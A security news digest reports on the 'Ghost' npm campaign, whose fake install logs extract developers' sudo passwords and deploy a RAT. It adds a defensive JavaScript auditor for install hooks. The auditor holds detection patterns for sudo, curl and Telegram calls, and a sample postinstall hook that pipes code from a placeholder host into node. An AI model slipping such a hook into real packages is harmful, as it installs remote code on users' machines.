Malware & Ransomware · HIGH

Malware - Fake npm Install Messages Spread RAT in Campaign

Cyber Security News
Tags: npm · RAT · Ghost campaign · malware · ReversingLabs

In short: fake npm installation output tricks developers into handing over their sudo password and, with it, installing a remote access trojan on their machines.

Quick Summary

A new malware campaign is deceiving developers through fake npm install messages. This clever tactic hides a RAT that steals sensitive data. Developers must be vigilant to protect their systems from this threat.

What Happened

A new and sophisticated software supply chain campaign is targeting developers via the npm package registry. Dubbed the Ghost campaign, it began in early February 2026. The campaign employs a set of deceptive npm packages designed to mislead developers into surrendering their system credentials while secretly deploying a remote access trojan (RAT) on their machines.

When a developer installs one of these malicious packages, the install script produces output that looks like a normal npm installation: it prints log messages, shows a progress bar, and inserts random delays to make the run feel genuine. None of the packages it claims to be downloading actually exist, but the output is convincing enough that even experienced developers have difficulty spotting the malicious activity.

Who's Being Targeted

The campaign primarily targets developers who frequently use the npm package registry. The seven identified packages include names like react-performance-suite, react-state-optimizer-core, and coinbase-desktop-sdk, all published by a user named “mikilanjillo.” This deceptive tactic is particularly concerning as it represents a shift in how threat actors operate within open-source ecosystems, making it harder to spot malicious intent.

In March 2026, further analysis revealed a related cluster, dubbed GhostClaw, which shares similar techniques and infrastructure. This indicates that the campaign may be broader than initially thought, potentially affecting a larger number of developers and projects.

Signs of Infection

One of the most deceptive elements of this campaign is how it tricks developers into providing their sudo password. The installation process reports an error about missing write permissions and prompts the developer to enter their sudo (root) password. The request feels entirely expected, since permission errors during npm installs are common.

Once the password is entered, the malware's downloader runs silently while the fake logs continue to scroll, masking the malicious activity. The downloader then contacts a Telegram channel to fetch the final payload URL and its decryption key, after which the RAT is executed, giving the attackers persistent access to the compromised system.

How to Protect Yourself

Developers should exercise caution when installing npm packages. Here are some key protective measures:

  • Never enter your sudo or root password when prompted by an npm package during installation.
  • Verify the package authors and repository history before installing.
  • Use automated security scanning tools to identify suspicious install scripts.
  • Enforce strict dependency review workflows within your organization.

By treating any password prompts during software installations as major warning signs, developers can significantly reduce their risk of falling victim to such sophisticated attacks.
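The third measure above (automated scanning for suspicious install scripts) and the "Signs of Infection" section both come down to the same question: what does a package run automatically during `npm install`, and does it try to escalate privileges, prompt for a password, or fetch something from the network while doing so? The following is an added example, not code from the article or from ReversingLabs, of a small auditor for npm lifecycle hooks. It reads the text of a package.json, extracts the hooks npm runs without user interaction, and flags patterns matching the behaviour described above. The indicator list, the `api.telegram.org` heuristic and both sample manifests are constructed for illustration and are not drawn from the campaign's actual packages.

```javascript
// Added example, not code from the article or from ReversingLabs: a small
// auditor for the lifecycle hooks npm runs automatically during `npm install`.
// It takes the text of a package.json, extracts the install-time hooks and
// flags patterns that match the behaviour the article describes (a sudo or
// password prompt, an in-script downloader, encoded or dynamically evaluated
// payloads, a process left running in the background). The indicator set and
// both sample manifests are constructed for illustration.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic indicators: each regex is tested against the hook's command line.
// `api.telegram.org` is listed because the article reports the downloader
// fetching its payload URL from Telegram; treating that host as an indicator
// is an assumption of this example, not a claim the article makes.
const INDICATORS = [
  { label: 'privilege-escalation', re: /\bsudo\b|\bsu\b\s+-?\s*root/ },
  { label: 'password-prompt',      re: /read\s+-s|password|passwd/i },
  { label: 'remote-download',      re: /\b(curl|wget)\b|https?:\/\// },
  { label: 'telegram-api',         re: /api\.telegram\.org/i },
  { label: 'dynamic-eval',         re: /\beval\s*\(|new\s+Function\s*\(/ },
  { label: 'encoded-payload',      re: /base64|\b[A-Za-z0-9+/]{60,}={0,2}\b/ },
  { label: 'background-process',   re: /\bnohup\b|\bsetsid\b|\bdisown\b|&\s*$/m },
];

// Audits one manifest. Returns the package name, the install-time hooks found
// and a list of findings ({ hook, label, excerpt }) for a reviewer to inspect.
function auditLifecycleScripts(packageJsonText) {
  const manifest = JSON.parse(packageJsonText);
  const scripts = manifest.scripts || {};
  const hooks = {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    hooks[hook] = cmd;
    for (const { label, re } of INDICATORS) {
      const m = cmd.match(re);
      if (m) findings.push({ hook, label, excerpt: m[0] });
    }
  }
  return { name: manifest.name, hooks, findings };
}

// Policy: a privilege-escalation or password-prompt indicator is enough to
// block on its own; otherwise require two distinct indicators, because a
// single URL in a build script is common and usually benign.
function isSuspicious(audit) {
  const labels = new Set(audit.findings.map((f) => f.label));
  if (labels.has('privilege-escalation') || labels.has('password-prompt')) return true;
  return labels.size >= 2;
}

// Constructed sample mimicking the article's pattern: a fake permission error,
// a sudo prompt, then a downloader left running in the background.
const SUSPICIOUS_MANIFEST = JSON.stringify({
  name: 'example-suspicious-package', // placeholder, not a real package
  version: '1.0.0',
  scripts: {
    postinstall: 'echo "EACCES: permission denied, mkdir" && sudo -S node lib/fix-perms.js && curl -s https://example.invalid/stage2 | node &',
  },
});

// Constructed benign sample: an ordinary native-build step with no indicators.
const BENIGN_MANIFEST = JSON.stringify({
  name: 'example-benign-package', // placeholder, not a real package
  version: '2.3.1',
  scripts: { install: 'node-gyp rebuild', test: 'mocha' },
});

// Stand-alone run: print a verdict and the findings for each sample.
for (const text of [SUSPICIOUS_MANIFEST, BENIGN_MANIFEST]) {
  const audit = auditLifecycleScripts(text);
  console.log(audit.name, isSuspicious(audit) ? 'SUSPICIOUS' : 'ok', audit.findings);
}
```

In practice the auditor would be run over every package.json under node_modules after an `npm install --ignore-scripts`, so that hooks are inspected before they are ever executed; a finding is a prompt for human review of the package, not proof of compromise, since legitimate native modules also download prebuilt binaries during install.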

🔒 Pro insight: The Ghost campaign exemplifies evolving tactics in supply chain attacks, emphasizing the need for robust dependency management and user education.

Original article from

Cyber Security News · Tushar Subhra Dutta


Related Pings

HIGH · Malware & Ransomware

WebRTC Skimmer - Bypasses CSP to Steal Payment Data

A new WebRTC skimmer is stealing payment data from e-commerce sites by bypassing security controls. This malware exploits vulnerabilities in Magento, affecting many online stores. Site owners must act quickly to protect their customers and secure their platforms.

The Hacker News

HIGH · Malware & Ransomware

Malware - Fake VS Code Alerts Fuel Phishing Campaign on GitHub

A phishing campaign on GitHub is tricking developers with fake VS Code alerts. These alerts lead to malware downloads, posing serious risks. Always verify updates through official channels to stay safe.

Cyber Security News

HIGH · Malware & Ransomware

Malware Hits LiteLLM - Credential Harvesting Incident Revealed

LiteLLM, a popular AI project, was hit by malware that harvested user credentials. Millions of users are affected, raising serious security concerns. The developers are working to resolve the issue and prevent future attacks.

TechCrunch Security

HIGH · Malware & Ransomware

RedLine Infostealer - Alleged Conspirator Extradited to US

An Armenian man has been extradited to the US for his role in the RedLine infostealer malware. This notorious software has stolen billions of credentials, affecting countless users. His extradition is a significant move in the fight against cybercrime, emphasizing the need for vigilance.

CyberScoop

HIGH · Malware & Ransomware

Malware - Russian National Convicted for Botnet Attacks

A Russian hacker was sentenced for running a botnet that attacked U.S. firms. His actions resulted in over $14 million in extortion payments. This case highlights the serious risks of cybercrime.

Security Affairs

HIGH · Malware & Ransomware

Ransomware - US Healthcare Provider Hit by Iranian Gang

A U.S. healthcare provider has been targeted by the Iranian ransomware gang Pay2Key. This attack underscores the growing risk to critical infrastructure. Organizations must enhance their cybersecurity measures to combat such threats.

SC Media